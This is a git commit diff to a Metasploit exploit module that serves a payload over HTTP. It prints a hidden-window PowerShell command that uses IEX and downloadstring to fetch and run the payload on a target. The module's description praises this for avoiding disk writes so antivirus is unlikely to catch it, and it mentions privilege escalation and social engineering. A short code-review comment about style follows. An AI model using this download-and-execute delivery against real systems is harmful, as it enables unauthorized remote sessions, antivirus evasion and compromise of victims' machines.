Final updates and tidy

bug/bundler_fix
Meatballs 2013-07-24 17:28:19 +01:00
parent fe405d2187
commit 18ac83bec1
1 changed files with 16 additions and 17 deletions


@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Powershell HTTP Downloader', 'Name' => 'Powershell HTTP Download Delivery',
'Description' => %q{ 'Description' => %q{
Quickly fires up a web server that serves the payload in powershell. Quickly fires up a web server that serves the payload in powershell.
Two commands are given, the first will download and execute the payload The command will start powershell and then download and execute the payload.
from within a powershell terminal. The second will start powershell and You can extract the IEX command to execute directly from powershell.
then download and execute the payload. The main goal of this module is The main goal of this module is that a session can be quickly established
so that a session can be quickly established on a target machine when on a target machine when you have to manually type in the command yourself,
you have to manually type in the command yourself. e.g. RDP Session, Local Access or maybe Remote Command Exec.
This does not write to disk so is unlikely to trigger AV solutions and will
allow you to attempt local privilege escalations supplied by meterpreter etc.
You could also try your luck with social engineering.
Ensure your payload architecture matches the target computer or use SYSWOW64
powershell.exe to execute x86 payloads on x64 machines.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
@ -47,19 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Delivering Payload") print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded) data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end end
def exploit def primer
datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6) url = get_uri()
url = (datastore['SSL'] ? "https://" : "http://")
url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_good(download_and_run) print_status("Run the following command on the target machine:")
print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"") print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
print_line
super
end end
end end
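Review bot: `url = get_uri()` in the new `primer` body calls a no-argument method with empty parentheses, while the rest of the block (`print_line`, `super`) omits them; `url = get_uri` keeps the hunk consistent with the file's style. The method also deserves a one-line comment, because the name `primer` does not say when the HttpServer mixin runs it — something like `# HttpServer hook; assumes the service is already listening so get_uri returns the live URL — confirm against the mixin`. The explicit `datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)` default removed in this hunk is presumably now supplied by `get_uri`/the mixin; that is worth confirming so an unset URIPATH does not silently serve from the root path. The `on_request_uri` method whose tail appears at the top of the second hunk starts outside the hunk.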